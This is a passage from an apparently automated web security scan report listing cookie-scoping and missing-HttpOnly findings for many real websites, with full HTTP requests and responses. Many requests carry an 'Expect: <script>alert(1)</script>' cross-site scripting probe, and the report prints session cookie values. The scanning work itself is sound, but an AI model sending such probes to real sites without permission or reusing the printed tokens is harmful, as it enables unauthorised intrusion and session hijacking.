Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:35 GMT; domain=.bing.com; path=/
Content-Length: 2611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; char
...[SNIP]...
16.57. http://www.bing.com/fd/ls/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/l

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/ls/l?IG=2d5571d309564964970af86c3c5fef46&PM=Y&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22PC%22:4,%22FC%22:-1,%22BC%22:4,%22BS%22:12,%22H%22:15,%22FE%22:-1,%22LE%22:-1,%22C1%22:-1,%22C2%22:-1,%22BP%22:134,%22KP%22:-1,%22CT%22:139,%22IL%22:0}}&P=SERP&DA=Bl2 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sun, 01 May 2011 23:32:31 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;
16.58. http://www.bing.com/scopePopupHandler.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /scopePopupHandler.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scopePopupHandler.aspx?IID=SERP.1000&IG=2d5571d309564964970af86c3c5fef46&PM=Y HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; RMS=F=CgAg

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:34 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:33 GMT; domain=.bing.com; path=/
Content-Length: 4593

<div class="sc_pc" id="images"><ul class="sc_hl1"><li><a href="/images/search?q=wallpaper+filterui%3aimagesize-desktop_w_1024+filterui%3aimagesize-desktop_h_768&amp;qpvt=wallpaper" onmousedown="return
...[SNIP]...
16.59. http://www.dirtrider.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dirtrider.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dirtrider.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=egt43x45tiwnren54mtoic55; path=/; HttpOnly
Set-Cookie: UserPuid=2331437118715581986; domain=dirtrider.com; expires=Mon, 02-May-2061 00:20:09 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 43

GIF89a.......|.8...!.......,...........D..;
16.60. http://www.greenhulk.net/forums/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
16.61. http://www.greenhulk.net/forums/register.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/register.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/register.php HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.1.10.1304319910

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:28:52 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:28:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <me
...[SNIP]...
16.62. http://www.kylotteryretailers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kylotteryretailers.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kylotteryretailers.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:33:35 GMT
Server: IBM_HTTP_Server
Vary: Accept-Encoding
Content-Length: 476
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-a010362=a010302:0;Domain=kylotteryretailers.com;Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
16.63. http://www.schwabbankcreditcard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.schwabbankcreditcard.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schwabbankcreditcard.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:52:34 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=77F71A24745610746457FBAF17E09359; Path=/; Domain=.schwabbankcreditcard.com
Set-Cookie: TLTUID=77F71A24745610746457FBAF17E09359; Path=/; Domain=.schwabbankcreditcard.com; Expires=Mon, 02-05-2021 00:52:34 GMT
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
17. Cookie without HttpOnly flag set  previous  next
There are 170 instances of this issue:

17.1. http://dg.specificclick.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dg.specificclick.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?y=3&t=h&u=http%3A%2F%2Fwww.japanator.com%2Felephant%2Fsignup.phtml&r= HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7e-J^1^1; ug=wJ6hSWn821G3dA; smdmp=7e-J:811200901; adf=7e-J^0^0; JSESSIONID=e6b9ee4de5a3ea16db33db035dfa

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=e6cd1ea613a500dd6ba371035dc2; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 02 May 2011 01:57:37 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 569

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = docume
...[SNIP]...
17.2. http://t.mookie1.com/t/v1/event  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/event

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/event?migClientId=1392&migAction=cntwir_servicefamilyoverview_1&migSource=mig HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:09 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Fri, 25-May-12 23:35:09 GMT; domain=.mookie1.com
Set-Cookie: session=1304292909|1304292909; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;
17.3. http://www.92kqrs.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.92kqrs.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.92kqrs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 68
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDCSADQTQA=DOHBJHPCELCDEEPCDMDKOFHJ; path=/
Cache-control: private
Set-Cookie: NSC_DjubefmTjuft=ffffffff09021f0d45525d5f4f58455e445a4a423660;path=/

<br>Error, file not found: 404;http://www.92kqrs.com:80/favicon.ico
17.4. http://www.bluesplayer.co.uk/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bluesplayer.co.uk
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bluesplayer.co.uk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:10:49 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b7c32b2936f1354d9728de7d69c9cd94; path=/
Set-Cookie: filter=include; path=/
Set-Cookie: ctemplate=default; path=/
Set-Cookie: ctheme=dark-tube; path=/
Content-Type: text/html
Content-Length: 17593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
17.5. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:32:53 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:32:53 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=WXEJ2N3KRNFIDB4U3SIR5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207579474; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=609658d5a1ebcf5618d05b23302f38b7; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.32
Via: 1.1 12.120.78.32:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
17.6. http://www.chart.dk/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.chart.dk
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chart.dk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:10:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NID DSP NOI COR"
X-Powered-By: ASP.NET
Content-Length: 1302
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQATRTRBQ=JICBFFGCDKJPOHGJFBHOFKAN; path=/
Cache-control: private


<!-- netcoders ASP errorhandler -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:FF0000}
a:visited        {font:
...[SNIP]...
17.7. http://www.clickinks.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clickinks.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clickinks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Sun, 01 May 2011 23:49:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2jo5f13os0ec3z2tqss0vx1o; path=/; HttpOnly
Set-Cookie: OEM=; expires=Tue, 01-May-2001 23:49:24 GMT; path=/
Set-Cookie: MachineToken=676c3038-3d1e-4a84-ba81-895ddded8034; expires=Thu, 01-May-2031 07:00:00 GMT; path=/
Set-Cookie: phiddenId=ccd47da2-cd93-4362-834c-c48883e55ec6; expires=Tue, 03-May-2011 07:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 105282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Clickinks
...[SNIP]...
17.8. http://www.countrytabs.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.countrytabs.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.countrytabs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Date: Mon, 02 May 2011 00:31:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /404.asp
Content-Length: 129
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCCSQRTD=GIGJDNNCENLLGKFGALLAMGIH; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/404.asp">here</a>.</body>
17.9. http://www.crankyape.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.crankyape.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.crankyape.com
Proxy-Connection: keep-alive
Referer: http://www.crankyape.com/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:20 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSARCDQAB=MKADMMGCLDEMBHOGIDLDIPPF; path=/
Vary: Accept-Encoding
Content-Length: 19683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Bank repo rvs, motorcycles, snowmobiles, atvs, boats, trucks, trailers, go karts,
...[SNIP]...
17.10. http://www.email-foodnetworkstore.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.email-foodnetworkstore.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.email-foodnetworkstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: http://www.foodnetworkstore.com/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSABDBCBB=MNHLLAJCKLCOHPLAMNKJNEKK; path=/
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:39:03 GMT

17.11. http://www.email-pauladeenstore.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.email-pauladeenstore.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.email-pauladeenstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: http://www.pauladeenstore.com//favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQCDBRRTS=BKBNLAJCOJGBNGGAOGKBGOOE; path=/
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:13:50 GMT

17.12. http://www.hlsm.com/Demo/Main.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hlsm.com
Path:   /Demo/Main.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Demo/Main.asp HTTP/1.1
Host: www.hlsm.com
Proxy-Connection: keep-alive
Referer: http://www.hlsm.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

